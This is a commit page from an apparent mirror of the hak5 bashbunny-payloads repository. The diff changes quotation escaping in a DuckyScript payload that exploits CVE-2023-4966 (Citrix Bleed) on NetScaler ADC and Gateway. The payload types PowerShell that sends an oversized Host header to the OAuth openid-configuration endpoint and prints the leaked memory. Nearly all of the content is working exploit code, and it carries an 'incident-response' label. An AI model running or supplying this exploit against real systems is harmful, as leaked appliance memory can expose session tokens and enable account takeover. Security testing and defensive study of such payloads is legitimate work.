hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update win-payload.txt

pull/671/head
Aleff 2024-06-09 12:05:56 +02:00 committed by GitHub
parent 40e28fac9b
commit fd03dfda79
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt
View File

@ -3,7 +3,7 @@
* REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
* REM # Author : Aleff #
* REM # Version : 1.0 #
* REM # Category : incident-response #
* REM # Category : incident-response #
* REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
* REM # #
* REM ##################################################################################
@ -23,35 +23,35 @@ QUACK DELAY 1000
QUACK STRING $header_value = 'a' * 24576
QUACK ENTER
QUACK DELAY 500
QUACK STRING $header_value = $header_value -replace "\n", ""
QUACK STRING $header_value = $header_value -replace \"\n\", \"\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $headers="-H 'Host:$header_value'"
QUACK STRING $headers=\"-H 'Host:$header_value'\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $headers = @{'Host' = $header_value}
QUACK ENTER
QUACK DELAY 500
QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
QUACK STRING $uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
QUACK ENTER
QUACK DELAY 500
QUACK STRING if ($response.Substring(0, 3) -eq "200") {
QUACK STRING if ($response.Substring(0, 3) -eq \"200\") {
QUACK ENTER
QUACK DELAY 500
QUACK STRING Write-Host "--- Dumped memory ---"
QUACK STRING Write-Host \"--- Dumped memory ---\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING $response.Substring(131050) # 131051 - 1
QUACK ENTER
QUACK DELAY 500
QUACK STRING Write-Host "--- End ---"
QUACK STRING Write-Host \"--- End ---\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING } else {
QUACK ENTER
QUACK DELAY 500
QUACK STRING Write-Host "Could not dump memory"}
QUACK ENTER
QUACK STRING Write-Host \"Could not dump memory\"}
QUACK ENTER